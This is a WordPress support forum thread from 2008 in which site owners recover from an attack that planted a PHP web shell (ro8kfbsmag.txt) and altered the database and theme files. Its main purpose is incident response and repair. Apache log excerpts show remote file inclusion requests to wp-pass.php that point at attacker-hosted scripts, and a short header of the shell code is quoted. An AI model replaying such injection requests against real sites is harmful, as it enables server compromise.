Support » Developing with WordPress » Weird and Dangerous : ro8kfbsmag.txt

  • Well, I don’t know where to post this question.

    LAST WEEK, I had a big problem on my wordpress installation. All the plugins was disable and all the “attachement” posts status had changed to “post”… As a result, I saw no uploads file via the admin browser.

    After a short investigation, I saw that the last post in the database had only “ro8kfbsmagtxt” for content…

    I was able to repair the site by using a backup on my server.

    YESTERDAY, I was browsing via SSH on my server and I found in the TMP folder a file called “ro8kfbsmag.txt”… Hum hum. I downloaded it, and it’s a PHP script, with a form, and with the title :”Magic Include Shell by Mag icq 884888”

    Well, I don’t like it… 😮

    Here is the content of the file… If any WP guru could take care of it, It sounds dangerous to me…

    S.

    ———- ro8kfbsmag.txt —————

    <?php
    /*Magic Include Shell by Mag icq 884888*/
    //TODO: ñëèòü ôàéëî íà ñâîé ôòï (!), ðàáîòà ñ äèðàìè (.), ðåíåéì ôàéëîâ (?), îòïðàâêà ïîñò, ãåò, êóêîâ ÷åðåç ñîêåòû (!!!)
    $ver='1.6';
    if(isset($_GET[pizdecnax]))
    {
    ...

    Large PHP code removed by moderator. You can find this file via google, if you want.

Viewing 15 replies - 16 through 30 (of 46 total)
  • Nevermind what i said before, I figured it out.
    If you pass the following SQL query to the database it should correct the pages/posts damage.

    In SQL:

    UPDATE wp_posts
    SET post_type = ‘page’
    WHERE menu_order<>’0′

    In PHP:

    $sql = ‘UPDATE wp_posts
    . ‘ SET post_type = \’page\”
    . ‘ WHERE menu_order<>\’0\”
    . ‘ ‘;

    Same happened to me today. After typing in the URL of my weblog, I just saw a lot of error messages, which included something like “permission denied” and “/../ (…) /tmp/ro8kbsmag.txt”. Site Layout was totally messed up, only one page was showing in the page menu.

    Took a further look into the database – same things as mentioned above. Pages were converted to posts, and I even saw posts that were supposed to be links to uploaded pictures…

    I replaced the database with a backup and now everything is fine. Guess I will have to update soon, that’s why my site is now in maintenance mode.

    Thanks for your help, pals!

    [Update]

    My webhost told me that it was injected using a vulnerability in wp-pass.php, also see

    http://seclists.org/bugtraq/2007/Jul/0039.html and e.g.

    How many times do I have to tell you? My wp-pass.php is patched!!

    http://trac.wordpress.org/ticket/4606

    Here’s a logfile excerpt:

    ———-
    http://www.saphod.net***201.43.55.205 – – [27/Mar/2008:01:48:41 +0100] “GET //wp-pass.php?_wp_http_referer=http://www.freewebs.com/haddem/phpbot.txt HTTP/1.1” 302 – “-” “Mozilla/3.0 (compatible; Indy Library)”
    http://www.saphod.net***81.86.41.163 – – [27/Mar/2008:02:43:48 +0100] “GET /wp-pass.php?_wp_http_referer=http://freewebs.com/diegoxfelix/ch.txt?? HTTP/1.1” 302 – “-” “Mozilla/3.0 (compatible; Indy Library)”
    http://www.saphod.net***72.4.241.28 – – [27/Mar/2008:02:54:08 +0100] “GET //wp-pass.php?_wp_http_referer=http://www.xsenharox.xpg.com.br/suvbni HTTP/1.1” 302 – “-” “Mozilla/3.0 (compatible; Indy Library)”
    http://www.saphod.net***72.4.241.28 – – [27/Mar/2008:04:00:53 +0100] “GET //wp-pass.php?_wp_http_referer=http://xsenharox.xpg.com.br/suvbni? HTTP/1.1” 302 – “-” “Mozilla/3.0 (compatible; Indy Library)”
    ———-

    This seems to be a known bug.

    My host replied I could suppress this behaviour by the following lines in .htaccess:

    ———-
    RewriteEngine On

    RewriteCond %{REQUEST_URI} (.*)wp-pass.php(.*) [NC]
    RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC]
    RewriteRule ^(.*) – [F]
    ———–

    For this, also see:
    http://wp.dembowski.net/2007/07/10/htaccess-to-prevent-wp-passphp-redirects/

    Well, I am not a Rewrite guru… would WP still work after this? Anyway, I should update… is this patched in 2.3.3?

    >the admin password was changed

    I would trash that user account because they already know the username and create a new admin account.

    Today, I noticed that my header.php and footer.php must have been altered: there were some strange spam links in the (generated) HTML-code of my site within a DIV-container that had the attribute “hidden”.

    That must have slipped my mind while upgrading my WP installation: of course, my (custom) theme templates were NOT upgraded.

    Thank God the code was not (X)HTML-valid: I found it while validating. 🙂

    That also seems to have been done by the hack, so make sure you check your theme files are OK.

    OK, I took a further look at those links that appeared in my hacked footer.php. ALL OF THEM lead to a domain called http://www.rashmisinha.com. That looks like a normal blog, but now, try this (this is just for presentation purposes, not supposed for spamming reasons here):

    http://www.rashmisinha.com/archive/rams/9/919588447.html

    This leads to tablets-city.com!!!

    Is this another exploit?

    I tried to contact the blog author of http://www.rashmisinha.com, but found no contact details. Apparently, she is a cofounder of slideshare.net. Can anyone with an account there write on her wall? It seems like her server was turned in to a zombie.

    Couldn’t find anything on the net for “archive/rams/…”

    I got hit with this, too, and I have a couple of questions.

    Does WordPress issue security bulletins? It would be nice to have a central clearing house (with an RSS feed or e-mail list) for information on this kind of exploit, including exactly which versions are affected, and all the steps needed to a) close the vulnerability and b) repair the damage. Maybe this exists and I don’t know about it?

    I *think* I’ve both closed the hole and repaired the damage (or most of it; still haven’t converted my pages back to pages), but I may have missed something.

    Thanks!

    Would the posters who have been hit by this hack please post which version of WordPress they are running.

    Is this particular hack something that has been fixed in WP 2.5?

    whooami

    (@whooami)

    Member

    while it might seem valuable to know what versions someone was running, in the end its useless information

    Why?

    Because so many upgrades end up not being complete.. as evidenced by the hundreds of posts on here where someone missed upgrading a file, etc.. Ideally, someone is going to have all 2.5 files, or all 2.3.3 files, or .. or .. but some dont.

    Next, because someone discovers something running 2.5, or 2.3.3 doesnt necessarily mean that that version is insecure. It may very well mean that the owner upgraded from a version that had been previously exploited, but didnt know ..

    I have working examples. A previously exploited site that I set up logging on ..They had been running 2.1 something or 2.2 (I dont reme which). We upgraded them to 2.3.3, changing the only admin password in the process. It took only a matter of an hour or so, before said exploiter came back and tried to “insert content” into a post. Failing to do so, they immediately attempted an old, but very public SQL exploit that had been used to get the admin password. That didnt work either, obviously, since they were no longer running the older exploitable version.

    In other words, they already had the admin password from the blog being previously exploitable. They were going to be able to continue exploiting, until the password was changed. There was also no telling how long that previous admin password had been compromised, but it had probably been so for a while.

    Had it NOT been for the logging of all of this, and had the password not been changed, it would have outwardly have appeared as if 2.3.3 was vulnerable.

    Follow?

    The other factor is the PHP rootshell aspect of this. A good deal of people simply dont pay attention to the files to realize immediately when a rootshell was uploaded.

    Tack on insecure plugins..
    Tack on using other insecure web apps that dont get upgraded — joomla, coppermine, and gallery come to mind immediately in that regard.

    Is this particular hack something that has been fixed in WP 2.5?

    You make a miguided assumption in that question. Nothing indicates that 2.3.3 is, prima facea, insecure. Therefore, it follows that there is nothing to fix in 2.5.

    if you are paranoid, set up logging. Watch what happens to your blog.

    http://www.village-idiot.org/archives/2008/04/03/wordpress-capturing-_post-requests/

    — Lastly, as an addendum, ro8kfbsmag.txt is a PHP rootshell. left unnoticed on ANY web site, it does not matter what version of anything someone is using. Called directly, the file provides access to just about any shell command (atleast those that PHP has access to). You could have fort fricken knox installed and they would still have a way in. Well thats not entirely true, but you get the idea.

    Wooami,

    Thanks for info and link to capturing post request (it is now installed).

    I was recently struck by this as well, and here is what I did:

    1. I backed up the blog (I exported XML from withn in WP, and SQL from phpMyAdmin)
    2. I deleted my old version and installed a fresh, up to date WP instance
    3. Then I re-imported the blog structure (XML)

    Apparently I thought my pages were gone, until I discovered they were just downgraded to posts. That means my pages were indeed saved in the XML export but without menu_order attribute, since WP thought they were posts.
    No problem, since post_parent was still saved in XML, even for posts. So I did this to make convert the posts into pages.

    UPDATE wp_posts
    SET post_type = 'page'
    WHERE
    post_parent !=0

    WP still wouldn’t list them, so what I did then was to edit them using page.php?action=edit&post=xx which made them show up in the listing and work correctly from the index.php as well. What I’m wondering now is, do I have to do anything more than that to fully convert a post into a page?

    I’ve had this problem occur twice in the same 3 week period. And yes, I am in the midst of trying to upgrade to 2.5 now. My site is currently using 2.1.

    The first time this happened I followed instructions from the forum and everything worked great. This last time (today) I did the same things, and everything now works great except the following error at the top of my blog.

    Warning: include_once(/public_html/wp-content/plugins//../../../../../../../../../../../../../../../../../tmp/ro8kfbsmag.txt) [function.include-once]: failed to open stream: Permission denied in /public_html/wp-settings.php on line 205

    Warning: include_once() [function.include]: Failed opening ‘/public_html/wp-content/plugins//../../../../../../../../../../../../../../../../../tmp/ro8kfbsmag.txt’ for inclusion (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /public_html/wp-settings.php on line 205

    What do I do to fix this?

    I deleted the file ro8kfbsmag.txt, switched all my pages from posts back to pages and changed the upload location back to default. I can post and my blog works fine, it just has this error message and everything looks like crap.

    Thanks!

    P.S. The domain is http://www.crookedpitch.com

    whooami

    (@whooami)

    Member

    youre getting that error because something is trying to include that file. LOOK at the error.

    In other words, there is still malicious code in your files.

    Check your database, table “wp_options” and look for the option name “active_plugins”. I think I remember that it was changed to contain the path to that ro8kfbsmag.txt. If it does, just set the value blank and reactivate your plugins. That should work. But do not forget to backup your DB first.

    Also, look at your header.php and footer.php of your theme if it contains any suspicious links at the top or bottom!

    Saphod,

    Fantastic advice. That was exactly the fix to my current situation. Thank you so much!

Viewing 15 replies - 16 through 30 (of 46 total)
  • The topic ‘Weird and Dangerous : ro8kfbsmag.txt’ is closed to new replies.